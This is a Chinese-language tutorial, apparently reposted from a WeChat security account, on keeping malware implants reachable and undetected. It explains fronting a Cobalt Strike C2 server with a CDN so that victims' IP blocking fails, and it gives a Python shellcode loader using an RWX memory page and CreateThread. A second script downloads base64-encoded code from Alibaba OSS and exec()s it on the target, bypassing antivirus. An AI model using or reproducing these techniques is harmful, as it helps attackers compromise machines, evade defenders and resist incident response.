防朔源拉黑-CDN节点
1.购买一个域名,开启开启cdn
2.全球ping一下域名,可以看到cdn生效
3.根据自己cs版本修改对应c2项目文件
下载:https://github.com/threatexpress/malleable-c2
打开文件搜索http-get,将如下图修改为设置cdn的域名
搜索http-post,将如下图修改为设置cdn的域名
4.将该文件上传到服务端cs目录下
5.服务端启动cs时,执行命令:./teamserver ip 密码 jquery-c2.4.3.profile
6.启动客户端cs连接,创建监听器。将下图位置填写为设置cdn的域名。
7.如此防溯源拉黑操作就完成了
当设置木马远程连接的地址是本机真实ip时,对方可以使用流量监测工具看到网络外联,当其拉黑ip后我们便不能正常通信了。
配置cdn,让木马远程连接的地址是我们域名上配置的cdn节点,就算拉黑某个cdn节点的ip,其他的cdn节点ip也会顶替上来,还是能够正常通信。
防流量审计-OSS存储-上线
1.阿里云配置OSS对象存储
2.将如下加载代码替换shellcode后进行base64编码
加载器代码:
import ctypes
shellcode=b'你的shellcode'
ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(rwxpage), ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0,ctypes.c_uint64(rwxpage), 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
编码:
编码成功保存到txt文件中
3.将txt文件上传到阿里云oss,上传成功点击分享,获取访问链接
4.将访问链接写入如下python加载代码
代码:http.py
import ctypes,base64
from urllib.request import urlopen
url=urlopen("访问链接")
z=url.read()
zx=base64.b64decode(z)
exec(zx)
5.将http.py上传到目标系统,使用python执行即可上线(也可以打包成exe程序上传)。
绕过检测
成功上线
6.为什么使用OSS?
在做shellcode分离时,如果从一个不受信任的url加载shellcode,可能会被杀软检测拦截。
使用阿里云的OSS存储,加载shellcode文件,那么url是阿里云的,是绿标网站,就会被杀软放行。
网络安全技术交流新建wx群:
QQ群:708769345
原文始发于微信公众号(小黑子安全):免杀对抗-防溯源拉黑+防流量审计
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论